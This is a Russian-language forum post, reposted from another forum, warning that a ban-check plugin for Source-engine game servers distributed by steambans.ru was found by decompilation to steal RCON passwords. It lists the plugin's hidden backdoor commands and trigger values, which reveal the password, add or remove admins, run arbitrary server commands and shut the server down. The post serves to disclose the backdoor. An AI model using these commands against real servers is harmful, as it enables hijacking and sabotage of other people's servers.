Не так давно появился декомпилятор плагинов sourcemod.
Благодаря ему можно получить исходные коды smx плагина.
В частности речь пойдет о сайте steambans.ru который позиционирует себя как "Единая Российская Бан-Система, для игр на движках Source и Orange Box."
Ими предлагается установить плагин который проверяет наличие банов у подключающихся игроков. Но как оказалось, помимо этой функции, плагин крал rcon пароли серверов.
Помимо этого плагин содержал команды на доступ к администрированию сервера через rcon или mani admin plugin:
 | | |
| Код: f_pview 2590772697126468 = покажет ркон пароль, тому кто написал эту команду f_pview 12953863485632342354 = уникально сгенерированный плагином пароль сервера для команд, предоставленных ниже: f_protect <уникально сгенерированный плагином пароль сервера> mani_client_add <nick> = добавляет админа f_protect <уникально сгенерированный плагином пароль сервера> mani_client_remove <nick|steamid|ip> = удаляет админа f_protect <уникально сгенерированный плагином пароль сервера> execute <command> = заставляет сервер ввести команду как ркон f_protect <уникально сгенерированный плагином пароль сервера> shutdown - вырубает сервер | |
| | |
скопипизжено с: http://hlmod.ru/forum/novosti/6637-krup ... rolei.html
